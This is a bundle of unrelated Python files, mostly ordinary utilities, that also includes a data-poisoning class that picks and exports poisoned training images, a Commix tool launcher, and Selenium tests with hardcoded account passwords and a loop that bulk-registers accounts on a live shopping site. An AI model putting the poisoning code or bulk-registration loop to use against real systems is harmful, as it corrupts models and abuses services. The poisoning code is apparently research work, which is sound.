# Definition for singly-linked list.
class ListNode(object):
def __init__(self, val):
self.val = val
self.next = None
class LinkedList(object):
def __init__(self):
self.val = None
@staticmethod
def add(val):
return ListNode(val)
def insert(self, node, val):
if node is None:
return self.add(val)
else:
node.next = self.insert(node.next, val)
return node
@staticmethod
def print(node):
while node is not None:
print(node.val)
node = node.next
class Solution(object):
def reverseList(self, head):
"""
:type head: ListNode
:rtype: ListNode
"""
if head is None:
return None
temp = head
while temp.next is not None:
temp = temp.next
tail = temp
ret = tail
while tail.next != head:
temp = head
while temp.next is None or temp.next != tail:
temp = temp.next
temp.next = temp.next.next
tail.next = temp
tail = tail.next
return ret
a = LinkedList()
root = a.add(1)
# print(root)
for i in range(5):
a.insert(root, i)
# print(i)
# print(a)
a.print(root)
x = Solution()
a.print(x.reverseList(root))
|
#!/usr/bin/python -tt
#
# Copyright (c) 2008, 2009, 2010 Intel, Inc.
#
# Anas Nashif
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation; version 2 of the License
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc., 59
# Temple Place - Suite 330, Boston, MA 02111-1307, USA.
from pykickstart.base import *
from pykickstart.errors import *
from pykickstart.options import *
from pykickstart.commands.bootloader import *
class Moblin_Bootloader(F8_Bootloader):
def __init__(self, writePriority=10, appendLine="", driveorder=None,
forceLBA=False, location="", md5pass="", password="",
upgrade=False, menus=""):
F8_Bootloader.__init__(self, writePriority, appendLine, driveorder,
forceLBA, location, md5pass, password, upgrade)
self.menus = ""
def _getArgsAsStr(self):
ret = F8_Bootloader._getArgsAsStr(self)
if self.menus == "":
ret += " --menus=%s" %(self.menus,)
return ret
def _getParser(self):
op = F8_Bootloader._getParser(self)
op.add_option("--menus", dest="menus")
return op
|
#!/usr/bin/env python2
# encoding: UTF-8
"""
This file is part of Commix Project (https://commixproject.com).
Copyright (c) 2014-2019 Anastasios Stasinopoulos (@ancst).
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
For more see the file 'readme/COPYING' for copying permission.
"""
# Dummy check for missing module(s).
try:
__import__("src.utils.version")
from src.utils import version
version.python_version()
except ImportError:
err_msg = "Wrong installation detected (missing modules). "
err_msg = "Visit 'https://github.com/commixproject/commix/' for further details. \n"
print(settings.print_critical_msg(err_msg))
raise SystemExit()
# Main
if __name__ == '__main__':
try:
import src.core.main
except SystemExit:
import sys
raise SystemExit()
except KeyboardInterrupt:
import sys
raise SystemExit()
except:
from src.utils import common
common.unhandled_exception()
# eof
|
import os,sys, time, logging
from main.page.desktop_v3.register.pe_register import RegisterPage
from main.page.desktop_v3.register.pe_facebookapi import FacebookLoginPage
from main.page.desktop_v3.register.pe_googleapi import GooglePlusLoginPage
from main.page.desktop_v3.register.pe_create_password import CreatePasswordPage
from main.page.base import BasePage
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import NoAlertPresentException
#List semua error message yang mungkin muncul di halaman registrasi
error_list = {
'err_fullname' : "Nama Lengkap harus diisi.",
'err_phone' : "Nomor HP harus diisi.",
'err_gender' : "Jenis Kelamin harus dipilih.",
'err_birthdate' : "Tanggal Lahir tidak benar.",
'err_email' : "Alamat Email harus diisi.",
'err_passwd' : "Kata Sandi harus diisi.",
'err_toc' : "Anda harus menyetujui Syarat dan Ketentuan dari Tokopedia"
}
#akun fb
usr_email = 'testqcmir1@gmail.com'
usr_passwd = 'ukauka'
#akun google (sementara ngasal dulu)
usr_email2 = 'testqcmir2@gmail.com'
usr_passwd2 = 'cumicumi'
#create new password for tokopedia via fb
new_passwd = '12345678'
phone = '081312345678'
class registerActivity():
_site = "live"
fb_url = 'https://www.tokopedia.com/facebook_login.pl' #sementara di hardcode dulu, buat ngetes jalan apa engga
def __init__(self, driver):
self.driver = driver
self.obj_reg = RegisterPage(driver)
def set_param(self, param):
self.param = param
def loop_reg(self, N=1):
i, inc = 1, self.param['inc']
while i <= N:
self.obj_reg.open(self.param['site'])
self.obj_reg.input_full_name(self.param['name'] + str(chr(97+i)))
self.obj_reg.input_phone_number(self.param['phone'])
self.obj_reg.choose_gender(self.param['gender'])
self.obj_reg.choose_birth_day(self.driver)
self.obj_reg.choose_birth_month(self.driver)
self.obj_reg.choose_birth_year(self.driver)
email = self.param['prefix_email'] + str(inc) + "@gmail.com"
self.obj_reg.input_email(email)
self.obj_reg.input_password(self.param['password'])
self.obj_reg.input_confirm_password(self.param['password'])
self.obj_reg.check_tos("yes")
self.obj_reg.submit()
print("Done " + email)
time.sleep(3)
i += 1
inc += 1
#register normal
def test_do_register(self, driver, f_name, phone, gender_type, email_addr, password, conf_password, select_check_tos):
print("TEST #1 : REGISTER NORMAL")
register_page=RegisterPage(driver)
print("Masuk halaman register")
register_page.open(self._site)
print("Input nama")
register_page.input_full_name(f_name)
print("Input nomor HP")
register_page.input_phone_number(phone)
print("Pilih gender")
register_page.choose_gender(gender_type)
print("Pilih Tanggal Lahir")
register_page.choose_birth_day(driver)
print("Pilih Bulan Lahir")
register_page.choose_birth_month(driver) #<--belum selesai function nya, samakan dengan choose_birth_day
print("Pilih Tahun Lahir")
register_page.choose_birth_year(driver)
print("Input alamat e-mail")
register_page.input_email(email_addr)
print("Input Password")
register_page.input_password(password)
print("Input konfirmasi password")
register_page.input_confirm_password(conf_password)
print("Menyetujui terms of service")
register_page.check_tos(select_check_tos)
print("Klik Submit")
register_page.submit()
print("Selesai.")
#added by mir#
#action 1 : Input Null
def check_validasi_input_null(self, driver):
print ("TEST #2 : REGISTER NULL")
register_page=RegisterPage(driver)
register_page.open(self._site)
register_page.submit()
print ("Checking validation....")
assert error_list['err_fullname'] in driver.find_element_by_tag_name("body").text
print ("Fullname error message validation OK")
assert error_list['err_phone'] in driver.find_element_by_tag_name("body").text
print ("Mobile phone error message validation OK")
assert error_list['err_gender'] in driver.find_element_by_tag_name("body").text
print ("Gender error message validation OK")
assert error_list['err_birthdate'] in driver.find_element_by_tag_name("body").text
print ("Birthdate error message validation OK")
assert error_list['err_email'] in driver.find_element_by_tag_name("body").text
print ("E-mail error message validation OK")
assert error_list['err_passwd'] in driver.find_element_by_tag_name("body").text
print ("Password error message validation OK")
assert error_list['err_toc'] in driver.find_element_by_tag_name("body").text
print ("Terms of Conduct error message validation OK")
print ("")
print ("Validation finished.")
#action 2: Register with Facebook, FB not logged in & not connected to tokopedia
#FIRST TIME USE ONLY!
def check_link_register_via_fb(self, driver):
register_page=RegisterPage(driver)
register_page.open(self._site)
print("TEST #3 : REGISTER VIA FB")
print("Klik tombol 'Masuk dengan Facebook'")
register_page.register_via_facebook()
#insert assertion buat halaman login fb
print("Masuk www.tokopedia.com/facebook_login.pl (redirect ke halaman fb)")
fb_login = FacebookLoginPage(driver)
print("input e-mail akun fb")
fb_login.input_email_or_hp(usr_email)
time.sleep(1)
print("input password akun fb")
fb_login.input_password(usr_passwd)
time.sleep(1)
print("Klik tombol login")
fb_login.login()
driver.switch_to_alert()
print('Berhasil masuk dialog box connect apps')
fb_login.fb_okay(driver)
print('Berhasil connect app')
print("Masuk halaman create_password.pl")
create_password = CreatePasswordPage(driver)
create_password.input_new_password(driver, new_passwd)
create_password.confirm_new_password(driver, new_passwd)
create_password.input_phone_number(driver, phone)
create_password.check_tos(driver, 'yes')
create_password.submit(driver)
print('selesai')
#action 3: Register with Google+, google not login & not connected to tokopedia
#FIRST TIME USE ONLY!
def check_link_register_via_google(self, driver):
register_page=RegisterPage(driver)
register_page.open(self._site)
print ('TEST #4 : REGISTER VIA GOOGLE+')
register_page.register_via_google()
print('Masuk halaman konfirmasi utk connect tokopedia & google')
google_login = GooglePlusLoginPage(driver)
print("input e-mail akun google")
google_login.input_email(driver, usr_email2)
time.sleep(1)
print("input password akun google")
google_login.input_password(driver,usr_passwd2)
time.sleep(1)
print("Klik tombol login")
google_login.login(driver)
#driver.switch_to_alert()
print('Masuk halaman autentikasi')
time.sleep(3)
google_login.click_accept(driver)
print("Masuk halaman create_password.pl")
time.sleep(1)
create_password = CreatePasswordPage(driver)
create_password.input_new_password(driver, new_passwd)
create_password.confirm_new_password(driver, new_passwd)
create_password.choose_birth_day(driver)
create_password.choose_birth_month(driver)
create_password.choose_birth_year(driver)
create_password.input_phone_number(driver, phone)
create_password.check_tos(driver, 'yes')
create_password.submit(driver)
print('Selesai')
|
import re
# Will look for the word ape and if ape is found, it will print "There is an ape"
if re.search("ape", "The ape was at the apex"):
print("There is an ape")
# Will look for the word ape and it print the word ape
allApes = re.findall("ape", "The ape was at the apex")
for i in allApes:
print(i)
# Will look for the word ape and all words that begin with ape. Then it will print the word ape for each finding.
allApes2 = re.findall("ape.", "The ape was at the apex")
for i in allApes:
print(i)
|
import numpy as np
import cv2
img = cv2.imread('images/watch_big.jpg',cv2.IMREAD_COLOR)
#cv2.line(img,(0,0),(200,300),(255,255,255),50)
cv2.rectangle(img,(500,250),(700,300),(0,0,255),15)
#cv2.circle(img,(447,63), 63, (0,255,0), -1)
#pts = np.array([[100,50],[200,300],[700,200],[500,100]], np.int32)
#pts = pts.reshape((-1,1,2))
#cv2.polylines(img, [pts], True, (0,255,255), 3)
#font = cv2.FONT_HERSHEY_SIMPLEX
#cv2.putText(img,'OpenCV Tuts!',(10,50), font, 2, (200,255,155), 7, cv2.CV_AA)
cv2.imshow('image',img)
cv2.waitKey(0)
cv2.destroyAllWindows() |
"""
Trajectory RMSD
"""
import argparse as ap
import sys
import pytraj as pt
import numpy as np
from scripts.md._tools import load_traj, load_ref
from typing import Optional
# Default mask for heavy-atom RMSD (no H) on ligand of name LIG
default_mask = ":LIG&!@H="
def compute_rmsd(
itraj: str,
itop: Optional[str] = None,
iref: Optional[str] = None,
lig_mask: str = default_mask,
reimage: bool = False,
verbose: bool = False,
) -> np.ndarray:
"""
Compute RMSD for a trajectory with respect to a reference structure.
Args:
itraj (str): Trajectory file name
itop (str, optional): Topology file name
iref (str, optional): Reference file name
lig_mask (str, optional): Selection mask (in `pytraj` format) for the ligand
reimage (bool): Re-image coordinates according to PBC
Returns:
Returns a `np.ndarray` containing the frame number, an the RMSD (in angstrom)
with respect to the reference structure `iref`.
"""
if verbose:
print("Loading trajectory...", file=sys.stdout, end="")
lig_traj = load_traj(itraj, itop, mask=lig_mask)
if verbose:
print("done", file=sys.stdout)
if iref is not None:
if verbose:
print("Loading reference...", file=sys.stdout, end="")
lig_ref = load_ref(iref, itop, mask=lig_mask)
if verbose:
print("done", file=sys.stdout)
else:
lig_ref = 0
# Autoimage (for PBC)
if reimage:
if verbose:
print("Reimaging...", file=sys.stdout, end="")
lig_traj = pt.autoimage(lig_traj)
if iref is not None:
lig_ref = pt.autoimage(lig_ref)
if verbose:
print("done", file=sys.stdout)
# TODO: Align trajectory with reference structure
# (needs to load the whole trajectory)
# Compute RMSD (symmetrized)
if verbose:
print("Computing RMSD...", file=sys.stdout, end="")
rmsd = pt.analysis.rmsd.symmrmsd(
lig_traj, mask=lig_mask, ref=lig_ref, ref_mask=lig_mask, fit=False
)
if verbose:
print("done", file=sys.stdout)
# TODO: Add time
return np.stack((np.arange(0, lig_traj.n_frames), rmsd), axis=1)
def parse(args: Optional[str] = None) -> ap.Namespace:
"""
Parse command-line arguments.
Args:
args (str, optional): String to parse
Returns:
An `ap.Namespace` containing the parsed options
.. note::
If ``args is None`` the string to parse is red from ``sys.argv``
"""
# Parser
parser = ap.ArgumentParser(description="Plot ROC curve(s).")
# Add arguments
parser.add_argument("-x", "--traj", type=str, required=True, help="Trajectory file")
parser.add_argument("-t", "--top", type=str, default=None, help="Topology file")
parser.add_argument("-r", "--ref", type=str, default=None, help="Reference file")
parser.add_argument(
"-m",
"--mask",
type=str,
default=default_mask,
help="Atom or residue mask (pytraj format)",
)
parser.add_argument(
"-o", "--output", type=str, required=True, help="RMSD output file"
)
parser.add_argument("--plot", action="store_true", help="Plot RMSD vs time")
parser.add_argument(
"--reimage", action="store_true", help="Re-image trajectory within PBC box"
)
parser.add_argument(
"-v", "--verbose", action="store_true", help="Verbose execution"
)
# Parse arguments
return parser.parse_args(args)
if __name__ == "__main__":
import os
args = parse()
if not os.path.isfile(args.traj):
raise FileNotFoundError(args.traj)
if args.top is not None and not os.path.isfile(args.top):
raise FileNotFoundError(args.top)
if args.ref is not None and not os.path.isfile(args.ref):
raise FileNotFoundError(args.ref)
# Compute RMSD ([frame, RMSD (A)])
rmsd = compute_rmsd(
args.traj, args.top, args.ref, args.mask, args.reimage, args.verbose
)
# Save RMSD to file
np.savetxt(args.output, rmsd)
if args.plot:
raise NotImplementedError()
|
"""Data class, holding information about dataloaders and poison ids."""
import torch
import numpy as np
import pickle
import datetime
import os
import warnings
import random
import PIL
from .datasets import construct_datasets, Subset
from .cached_dataset import CachedDataset
from .diff_data_augmentation import RandomTransform
from ..consts import PIN_MEMORY, BENCHMARK, DISTRIBUTED_BACKEND, SHARING_STRATEGY, MAX_THREADING
from ..utils import set_random_seed
torch.backends.cudnn.benchmark = BENCHMARK
torch.multiprocessing.set_sharing_strategy(SHARING_STRATEGY)
class Kettle():
"""Brew poison with given arguments.
Data class.
Attributes:
- trainloader
- validloader
- poisonloader
- poison_ids
- trainset/poisonset/targetset
Most notably .poison_lookup is a dictionary that maps image ids to their slice in the poison_delta tensor.
Initializing this class will set up all necessary attributes.
Other data-related methods of this class:
- initialize_poison
- export_poison
"""
def __init__(self, args, batch_size, augmentations, setup=dict(device=torch.device('cpu'), dtype=torch.float)):
"""Initialize with given specs..."""
print("initialse with arguments")
self.args, self.setup = args, setup
self.batch_size = batch_size
self.augmentations = augmentations
self.trainset, self.validset, self.carset = self.prepare_data(normalize=True)
num_workers = self.get_num_workers()
if self.args.lmdb_path is not None:
from .lmdb_datasets import LMDBDataset # this also depends on py-lmdb
self.trainset = LMDBDataset(self.trainset, self.args.lmdb_path, 'train')
self.validset = LMDBDataset(self.validset, self.args.lmdb_path, 'val')
if self.args.cache_dataset:
self.trainset = CachedDataset(self.trainset, num_workers=num_workers)
self.validset = CachedDataset(self.validset, num_workers=num_workers)
num_workers = 0
if self.args.poisonkey is None:
if self.args.benchmark != '':
with open(self.args.benchmark, 'rb') as handle:
setup_dict = pickle.load(handle)
self.benchmark_construction(setup_dict[self.args.benchmark_idx]) # using the first setup dict for benchmarking
else:
self.random_construction()
else:
if '-' in self.args.poisonkey:
# If the poisonkey contains a dash-separated triplet like 5-3-1, then poisons are drawn
# entirely deterministically.
self.deterministic_construction()
else:
# Otherwise the poisoning process is random.
# If the poisonkey is a random integer, then this integer will be used
# as a key to seed the random generators.
self.random_construction()
# Generate loaders:
self.trainloader = torch.utils.data.DataLoader(self.trainset, batch_size=min(self.batch_size, len(self.trainset)),
shuffle=True, drop_last=False, num_workers=num_workers, pin_memory=PIN_MEMORY)
self.validloader = torch.utils.data.DataLoader(self.validset, batch_size=min(self.batch_size, len(self.validset)),
shuffle=False, drop_last=False, num_workers=num_workers, pin_memory=PIN_MEMORY)
validated_batch_size = max(min(args.pbatch, len(self.poisonset)), 1)
self.poisonloader = torch.utils.data.DataLoader(self.poisonset, batch_size=validated_batch_size,
shuffle=self.args.pshuffle, drop_last=False, num_workers=num_workers,
pin_memory=PIN_MEMORY)
# Ablation on a subset?
if args.ablation < 1.0:
self.sample = random.sample(range(len(self.trainset)), int(self.args.ablation * len(self.trainset)))
for pidx in self.poison_ids:
if pidx not in self.sample:
self.sample.append(pidx.item())
print("sample images = ", len(self.sample), self.poison_ids)
self.partialset = Subset(self.trainset, self.sample)
self.partialloader = torch.utils.data.DataLoader(self.partialset, batch_size=min(self.batch_size, len(self.partialset)),
shuffle=True, drop_last=False, num_workers=num_workers, pin_memory=PIN_MEMORY)
self.print_status()
""" STATUS METHODS """
def print_status(self):
print("print status")
class_names = self.trainset.classes
if self.poison_setup["poison_class"] is not None:
print(f'--Poison images drawn from class {class_names[self.poison_setup["poison_class"]]}.')
else:
print(f'--Poison images drawn from all classes.')
print(
f'Poisoning setup generated for threat model {self.args.threatmodel} and '
f'budget of {self.args.budget * 100}% - {len(self.poisonset)} images:')
print("here", len(self.targetset))
print(self.targetset[0], self.targetset[0][0], self.targetset[0][1])
print(
f'--Target images drawn from class {", ".join([class_names[self.targetset[i][1]] for i in range(len(self.targetset))])}'
f' with ids {self.target_ids}.')
print(f'--Target images assigned intended class {", ".join([class_names[i] for i in self.poison_setup["intended_class"]])}.')
if self.args.ablation < 1.0:
print(f'--Partialset is {len(self.partialset)/len(self.trainset):2.2%} of full training set')
num_p_poisons = len(np.intersect1d(self.poison_ids.cpu().numpy(), np.array(self.sample)))
print(f'--Poisons in partialset are {num_p_poisons} ({num_p_poisons/len(self.poison_ids):2.2%})')
def get_num_workers(self):
"""Check devices and set an appropriate number of workers."""
print("get num workers")
if torch.cuda.is_available():
num_gpus = torch.cuda.device_count()
max_num_workers = 4 * num_gpus
else:
max_num_workers = 4
if torch.get_num_threads() > 1 and MAX_THREADING > 0:
worker_count = min(min(2 * torch.get_num_threads(), max_num_workers), MAX_THREADING)
else:
worker_count = 0
# worker_count = 200
print(f'Data is loaded with {worker_count} workers.')
return worker_count
""" CONSTRUCTION METHODS """
def prepare_data(self, normalize=True):
print("prepare dataset")
trainset, validset, carset = construct_datasets(self.args.dataset, self.args.data_path, normalize)
# Prepare data mean and std for later:
self.dm = torch.tensor(trainset.data_mean)[None, :, None, None].to(**self.setup)
self.ds = torch.tensor(trainset.data_std)[None, :, None, None].to(**self.setup)
# Train augmentations are handled separately as they possibly have to be backpropagated
if self.augmentations is not None or self.args.paugment:
if 'CIFAR' in self.args.dataset:
params = dict(source_size=32, target_size=32, shift=8, fliplr=True)
elif 'MNIST' in self.args.dataset:
params = dict(source_size=28, target_size=28, shift=4, fliplr=True)
elif 'TinyImageNet' in self.args.dataset:
params = dict(source_size=64, target_size=64, shift=64 // 4, fliplr=True)
elif 'ImageNet' in self.args.dataset:
params = dict(source_size=224, target_size=224, shift=224 // 4, fliplr=True)
if self.augmentations == 'default':
self.augment = RandomTransform(**params, mode='bilinear')
elif not self.defs.augmentations:
print('Data augmentations are disabled.')
self.augment = RandomTransform(**params, mode='bilinear')
else:
raise ValueError(f'Invalid diff. transformation given: {self.augmentations}.')
return trainset, validset, carset
def deterministic_construction(self):
"""Construct according to the triplet input key.
The triplet key, e.g. 5-3-1 denotes in order:
target_class - poison_class - target_id
Poisons are always the first n occurences of the given class.
[This is the same setup as in metapoison]
"""
print("deterministic const")
if self.args.threatmodel != 'single-class':
raise NotImplementedError()
split = self.args.poisonkey.split('-')
if len(split) != 3:
raise ValueError('Invalid poison triplet supplied.')
else:
target_class, poison_class, target_id = [int(s) for s in split]
self.init_seed = self.args.poisonkey
print(f'Initializing Poison data (chosen images, examples, targets, labels) as {self.args.poisonkey}')
self.poison_setup = dict(poison_budget=self.args.budget,
target_num=self.args.targets, poison_class=poison_class, target_class=target_class,
intended_class=[poison_class])
self.poisonset, self.targetset, self.validset = self._choose_poisons_deterministic(target_id)
def benchmark_construction(self, setup_dict):
"""Construct according to the benchmark."""
print("benchmark const")
target_class, poison_class = setup_dict['target class'], setup_dict['base class']
budget = len(setup_dict['base indices']) / len(self.trainset)
self.poison_setup = dict(poison_budget=budget,
target_num=self.args.targets, poison_class=poison_class, target_class=target_class,
intended_class=[poison_class])
self.init_seed = self.args.poisonkey
self.poisonset, self.targetset, self.validset = self._choose_poisons_benchmark(setup_dict)
def _choose_poisons_benchmark(self, setup_dict):
# poisons
print("choose poisons benchmark")
class_ids = setup_dict['base indices']
poison_num = len(class_ids)
self.poison_ids = class_ids
# the target
self.target_ids = [setup_dict['target index']]
# self.target_ids = setup_dict['target index']
targetset = Subset(self.validset, indices=self.target_ids)
valid_indices = []
for index in range(len(self.validset)):
_, idx = self.validset.get_target(index)
if idx not in self.target_ids:
valid_indices.append(idx)
validset = Subset(self.validset, indices=valid_indices)
poisonset = Subset(self.trainset, indices=self.poison_ids)
# Construct lookup table
self.poison_lookup = dict(zip(self.poison_ids, range(poison_num)))
return poisonset, targetset, validset
def _choose_poisons_deterministic(self, target_id):
# poisons
print("choose poisons deterministic")
class_ids = []
for index in range(len(self.trainset)): # we actually iterate this way not to iterate over the images
target, idx = self.trainset.get_target(index)
if target == self.poison_setup['poison_class']:
class_ids.append(idx)
poison_num = int(np.ceil(self.args.budget * len(self.trainset)))
if len(class_ids) < poison_num:
warnings.warn(f'Training set is too small for requested poison budget.')
poison_num = len(class_ids)
self.poison_ids = class_ids[:poison_num]
# the target
# class_ids = []
# for index in range(len(self.validset)): # we actually iterate this way not to iterate over the images
# target, idx = self.validset.get_target(index)
# if target == self.poison_setup['target_class']:
# class_ids.append(idx)
# self.target_ids = [class_ids[target_id]]
# Disable for now for benchmark sanity check. This is a breaking change.
self.target_ids = [target_id]
targetset = Subset(self.validset, indices=self.target_ids)
valid_indices = []
for index in range(len(self.validset)):
_, idx = self.validset.get_target(index)
if idx not in self.target_ids:
valid_indices.append(idx)
validset = Subset(self.validset, indices=valid_indices)
poisonset = Subset(self.trainset, indices=self.poison_ids)
# Construct lookup table
self.poison_lookup = dict(zip(self.poison_ids, range(poison_num)))
dict(zip(self.poison_ids, range(poison_num)))
return poisonset, targetset, validset
def random_construction(self):
"""Construct according to random selection.
The setup can be repeated from its key (which initializes the random generator).
This method sets
- poison_setup
- poisonset / targetset / validset
"""
print("random const")
if self.args.local_rank is None:
if self.args.poisonkey is None:
self.init_seed = np.random.randint(0, 2**32 - 1)
else:
self.init_seed = int(self.args.poisonkey)
set_random_seed(self.init_seed)
print(f'Initializing Poison data (chosen images, examples, targets, labels) with random seed {self.init_seed}')
else:
rank = torch.distributed.get_rank()
if self.args.poisonkey is None:
init_seed = torch.randint(0, 2**32 - 1, [1], device=self.setup['device'])
else:
init_seed = torch.as_tensor(int(self.args.poisonkey), dtype=torch.int64, device=self.setup['device'])
torch.distributed.broadcast(init_seed, src=0)
if rank == 0:
print(f'Initializing Poison data (chosen images, examples, targets, labels) with random seed {init_seed.item()}')
self.init_seed = init_seed.item()
set_random_seed(self.init_seed)
# Parse threat model
self.poison_setup = self._parse_threats_randomly()
self.poisonset, self.targetset, self.validset, self.unseen_targetset = self._choose_poisons_randomly()
def _parse_threats_randomly(self):
"""Parse the different threat models.
The threat-models are [In order of expected difficulty]:
single-class replicates the threat model of feature collision attacks,
third-party draws all poisons from a class that is unrelated to both target and intended label.
random-subset draws poison images from all classes.
random-subset draw poison images from all classes and draws targets from different classes to which it assigns
different labels.
"""
print("parse threats randomly")
num_classes = len(self.trainset.classes)
target_class = np.random.randint(num_classes)
list_intentions = list(range(num_classes))
list_intentions.remove(target_class)
#intended_class = [np.random.choice(list_intentions)] * self.args.targets
intended_class = [6] * self.args.targets
if self.args.targets < 1:
poison_setup = dict(poison_budget=0, target_num=0,
poison_class=np.random.randint(num_classes), target_class=None,
intended_class=[np.random.randint(num_classes)])
warnings.warn('Number of targets set to 0.')
return poison_setup
if self.args.threatmodel == 'single-class':
poison_class = intended_class[0]
poison_setup = dict(poison_budget=self.args.budget, target_num=self.args.targets,
poison_class=poison_class, target_class=target_class, intended_class=intended_class)
elif self.args.threatmodel == 'third-party':
list_intentions.remove(intended_class[0])
poison_class = np.random.choice(list_intentions)
poison_setup = dict(poison_budget=self.args.budget, target_num=self.args.targets,
poison_class=poison_class, target_class=target_class, intended_class=intended_class)
elif self.args.threatmodel == 'self-betrayal':
poison_class = target_class
poison_setup = dict(poison_budget=self.args.budget, target_num=self.args.targets,
poison_class=poison_class, target_class=target_class, intended_class=intended_class)
elif self.args.threatmodel == 'random-subset':
poison_class = None
poison_setup = dict(poison_budget=self.args.budget,
target_num=self.args.targets, poison_class=None, target_class=target_class,
intended_class=intended_class)
elif self.args.threatmodel == 'random-subset-random-targets':
target_class = None
intended_class = np.random.randint(num_classes, size=self.args.targets)
poison_class = None
poison_setup = dict(poison_budget=self.args.budget,
target_num=self.args.targets, poison_class=None, target_class=None,
intended_class=intended_class)
else:
raise NotImplementedError('Unknown threat model.')
poison_setup[target_class] = 14
print("poison, target classes = ", poison_class, target_class)
return poison_setup
def _choose_poisons_randomly(self):
"""Subconstruct poison and targets.
The behavior is different for poisons and targets. We still consider poisons to be part of the original training
set and load them via trainloader (And then add the adversarial pattern Delta)
The targets are fully removed from the validation set and returned as a separate dataset, indicating that they
should not be considered during clean validation using the validloader
"""
print("choose poisons randomly")
# Poisons:
if self.poison_setup['poison_class'] is not None:
class_ids = []
#print(len(self.trainset), self.trainset.shape)
for index in range(len(self.trainset)): # we actually iterate this way not to iterate over the images
target, idx = self.trainset.get_target(index)
if target == self.poison_setup['poison_class']:
class_ids.append(idx)
poison_num = int(np.ceil(self.args.budget * len(self.trainset)))
print(len(class_ids), poison_num)
if len(class_ids) < poison_num:
warnings.warn(f'Training set is too small for requested poison budget. \n'
f'Budget will be reduced to maximal size {len(class_ids)}')
poison_num = len(class_ids)
self.poison_ids = torch.tensor(np.random.choice(
class_ids, size=poison_num, replace=False), dtype=torch.long)
print("Selected poisons", self.poison_ids)
else:
total_ids = []
for index in range(len(self.trainset)): # we actually iterate this way not to iterate over the images
_, idx = self.trainset.get_target(index)
total_ids.append(idx)
poison_num = int(np.ceil(self.args.budget * len(self.trainset)))
if len(total_ids) < poison_num:
warnings.warn(f'Training set is too small for requested poison budget. \n'
f'Budget will be reduced to maximal size {len(total_ids)}')
poison_num = len(total_ids)
self.poison_ids = torch.tensor(np.random.choice(
total_ids, size=poison_num, replace=False), dtype=torch.long)
# Targets:
if self.poison_setup['target_class'] is not None:
class_ids = []
for index in range(len(self.carset)): # we actually iterate this way not to iterate over the images
_, idx = self.carset.get_target(index)
class_ids.append(idx)
print(len(self.carset), class_ids)
self.target_ids = np.random.choice(class_ids, size=int(len(self.carset)*0.5), replace=False)
print("Selected targets: random 20 ",self.target_ids)
remaining_cars = [item for item in class_ids if item not in self.target_ids]
self.rem_ids = np.array(remaining_cars)
print("Remaining cars : ", self.rem_ids)
else:
total_ids = []
for index in range(len(self.validset)): # we actually iterate this way not to iterate over the images
_, idx = self.validset.get_target(index)
total_ids.append(idx)
self.target_ids = np.random.choice(total_ids, size=self.args.targets, replace=False)
#targetset = Subset(self.validset, indices=self.target_ids)
targetset = Subset(self.carset, indices=self.target_ids)
unseentargetset = Subset(self.carset, indices=self.rem_ids)
# search from multi car dataset
valid_indices = []
for index in range(len(self.validset)):
_, idx = self.validset.get_target(index)
if idx not in self.target_ids:
valid_indices.append(idx)
validset = Subset(self.validset, indices=valid_indices)
poisonset = Subset(self.trainset, indices=self.poison_ids)
# Construct lookup table
self.poison_lookup = dict(zip(self.poison_ids.tolist(), range(poison_num)))
return poisonset, targetset, validset, unseentargetset
def initialize_poison(self, initializer=None):
"""Initialize according to args.init.
Propagate initialization in distributed settings.
"""
print("initialise poison")
if initializer is None:
initializer = self.args.init
# ds has to be placed on the default (cpu) device, not like self.ds
ds = torch.tensor(self.trainset.data_std)[None, :, None, None]
if initializer == 'zero':
init = torch.zeros(len(self.poison_ids), *self.trainset[0][0].shape)
elif initializer == 'rand':
init = (torch.rand(len(self.poison_ids), *self.trainset[0][0].shape) - 0.5) * 2
init *= self.args.eps / ds / 255
elif initializer == 'randn':
init = torch.randn(len(self.poison_ids), *self.trainset[0][0].shape)
init *= self.args.eps / ds / 255
elif initializer == 'normal':
init = torch.randn(len(self.poison_ids), *self.trainset[0][0].shape)
else:
raise NotImplementedError()
init.data = torch.max(torch.min(init, self.args.eps / ds / 255), -self.args.eps / ds / 255)
# If distributed, sync poison initializations
if self.args.local_rank is not None:
if DISTRIBUTED_BACKEND == 'nccl':
init = init.to(device=self.setup['device'])
torch.distributed.broadcast(init, src=0)
init.to(device=torch.device('cpu'))
else:
torch.distributed.broadcast(init, src=0)
return init
""" EXPORT METHODS """
def export_poison(self, poison_delta, path=None, mode='automl'):
"""Export poisons in either packed mode (just ids and raw data) or in full export mode, exporting all images.
In full export mode, export data into folder structure that can be read by a torchvision.datasets.ImageFolder
In automl export mode, export data into a single folder and produce a csv file that can be uploaded to
google storage.
"""
print("export poison")
if path is None:
path = self.args.poison_path
dm = torch.tensor(self.trainset.data_mean)[:, None, None]
ds = torch.tensor(self.trainset.data_std)[:, None, None]
def _torch_to_PIL(image_tensor):
"""Torch->PIL pipeline as in torchvision.utils.save_image."""
image_denormalized = torch.clamp(image_tensor * ds + dm, 0, 1)
image_torch_uint8 = image_denormalized.mul(255).add_(0.5).clamp_(0, 255).permute(1, 2, 0).to('cpu', torch.uint8)
image_PIL = PIL.Image.fromarray(image_torch_uint8.numpy())
return image_PIL
def _save_image(input, label, idx, location, train=True):
"""Save input image to given location, add poison_delta if necessary."""
filename = os.path.join(location, str(idx) + '.png')
lookup = self.poison_lookup.get(idx)
if (lookup is not None) and train:
input += poison_delta[lookup, :, :, :]
_torch_to_PIL(input).save(filename)
# Save either into packed mode, ImageDataSet Mode or google storage mode
if mode == 'packed':
data = dict()
data['poison_setup'] = self.poison_setup
data['poison_delta'] = poison_delta
data['poison_ids'] = self.poison_ids
data['target_images'] = [data for data in self.targetset]
name = f'{path}poisons_packed_{datetime.date.today()}.pth'
torch.save([poison_delta, self.poison_ids], os.path.join(path, name))
elif mode == 'limited':
# Save training set
names = self.trainset.classes
for name in names:
os.makedirs(os.path.join(path, 'train', name), exist_ok=True)
